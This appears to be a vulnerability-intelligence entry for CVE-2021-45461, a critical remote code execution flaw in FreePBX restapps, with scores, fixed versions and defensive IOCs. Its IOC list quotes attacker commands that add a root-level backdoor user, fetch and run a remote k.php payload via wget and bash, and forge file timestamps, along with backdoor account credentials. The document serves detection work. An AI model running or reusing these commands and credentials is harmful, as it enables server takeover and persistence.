CVE-2021-45461
published 2021-12-22

Priority: P186 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW: VulnCheck KEV (exploited in the wild)
EPSS: 21.66% (97.3rd percentile)
FreePBX, when restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 is installed, allows remote attackers to execute arbitrary code, as exploited in the wild in December 2021. The fixed versions are 15.0.20 and 16.0.19.

Affected (4 ranges)

Vendor    Product    Version range    Fixed in
sangoma   restapps
sangoma   restapps
sangoma   restapps
sangoma   restapps

Detection & IOCs (extracted from sources)

ip: 37.49.230.74
url: hxxp://37.49.230.74/k.php
url: hxxp://37.49.230.74/z/wr.php
url: hxxp://37.49.230.74/z/post/noroot.php
url: hxxp://37.49.230.74/z/post/root.php
filename: k.php
filename: wr.php
path: /var/www/html/rest_phones/ajax.php
path: /var/www/html/admin/modules/core/ajax.php
path: /var/www/html/digium_phones/ajax.php
path: /var/www/html/admin/assets/js/config.php
path: /var/www/html/admin/assets/config.php
path: /var/www/html/admin/assets/ajax.php
path: /var/www/html/phones/ajax.php
path: /var/www/html/digium_phoness/ajax.php
path: /var/www/html/fpbxphones/ajax.php
path: /var/www/html/freepbxphones/ajax.php
path: /var/www/html/freepbx/ajax.php
path: /var/www/html/admin/views/ajax.php
path: /var/www/html/admin/views/.htaccess
path: /var/www/html/admin/modules/freepbx_ha/license.php
path: /var/spool/asterisk/tmp/serv
path: /var/lib/asterisk/bin/zen2
path: /var/lib/asterisk/bin/devnull2
path: /var/lib/asterisk/bin/devnull
path: /etc/freepbx.conf
command: useradd -s /bin/bash -ou 0 -g 0 -p '$1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1' newfpbx &>/dev/null
command: (setsid wget "hxxp://45[.]234[.]176[.]202/new/k.php" -O /var/spool/asterisk/tmp/serv 2>/dev/null >/dev/null; bash /var/spool/asterisk/tmp/serv 2>/dev/null > /dev/null & ) 2>&1
command: touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php
other: sugarmaint:uenQjcP3Il/zE
other: supports:uenQjcP3Il/zE
  • Look for the web shell parameter 'md5' in HTTP requests to ajax.php on FreePBX/Elastix servers — the web shell authenticates by comparing a user-supplied MD5 hash against a hardcoded value mapped to the victim's public IP.
  • Hunt for creation of local user accounts named 'sugarmaint', 'supports', or 'newfpbx' with UID 0 on FreePBX/Asterisk hosts.
  • Monitor for crontab entries that fetch and execute k.php from a remote IP every minute — a key persistence indicator for this campaign.
  • Detect file writes to /var/lib/asterisk/bin/ for non-standard binaries named 'zen2', 'devnull2', or 'devnull' — these are dropper persistence artifacts.
  • Alert on chmod 000 applied to ajax.php or model.php in FreePBX web directories — the dropper does this to clear the way before deploying its own web shell.
  • Detect timestamp-forging activity: 'touch <webshell_file> -r <legitimate_file>' in FreePBX web directories, used to blend malicious files with legitimate ones.
  • Monitor for the presence of license.php under /var/www/html/admin/modules/freepbx_ha/ — this is a malicious persistence dropper, not a legitimate FreePBX file.
  • The malware implants a random junk string in each download to evade hash-based IOC detection — rely on behavioral and path-based detections rather than file hashes alone.
  • The web shell's MD5 authentication hash is uniquely mapped per victim; the hardcoded hash value will differ across compromised hosts, making it unsuitable as a universal static IOC.
  • The malware injects random junk strings into each downloaded payload, so file hashes will be unique per download and cannot be relied upon for signature-based detection.
  • The dropper forges file timestamps on deployed web shells to match legitimate FreePBX files, so timestamp-based forensic triage will not reliably identify malicious files.
  • The web shell is deployed to at least 12 distinct paths under /var/www/html/; remediation must check all listed locations, not just the primary ajax.php path.
  • The dropper echoes the 'rm' command three times without executing it to create the false appearance of self-removal; do not assume the malware is gone based on log entries showing rm commands.

CVSS provenance

nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck · 9.8 CRITICAL